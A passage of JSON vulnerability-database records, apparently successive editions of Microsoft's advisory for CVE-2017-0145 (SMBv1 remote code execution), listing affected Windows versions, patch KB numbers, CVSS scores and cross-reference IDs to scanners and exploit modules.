"kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": 
"KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": 
"KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T14:58:45", "differentElements": ["msAffectedSoftware"], "edition": 73}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", 
"confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-21T08:57:08", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", 
"MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T14:58:45", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-20T14:58:45", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012215", "KB4014077", "KB3177186", "KBMS16-110, 3187754", "KB3205409", "KB3210720", "KB3213986", "KB3205401", "KB4013198", "KB4012598", "KB4012212", "KB3212646", "KB3210721", "KB4012217", "KB4012606", "KB4012214", "KB4012216", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": 
"KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for 
x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 
Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", 
"msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", 
"msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-21T08:57:08", "differentElements": ["msAffectedSoftware"], "edition": 74}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-21T10:46:37", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", 
"MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", 
"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-21T10:46:37", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-21T10:46:37", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KBMS16-110, 3187754", "KB4013198", "KB3210721", "KB4012214", "KB4012217", "KB4013429", "KB3213986", "KB4012212", "KB4012606", "KB4012216", "KB4014077", "KB3210720", "KB3177186", "KB3205409", "KB3212646", "KB3205401", "KB4012598", "KB4012215"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", 
"kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 
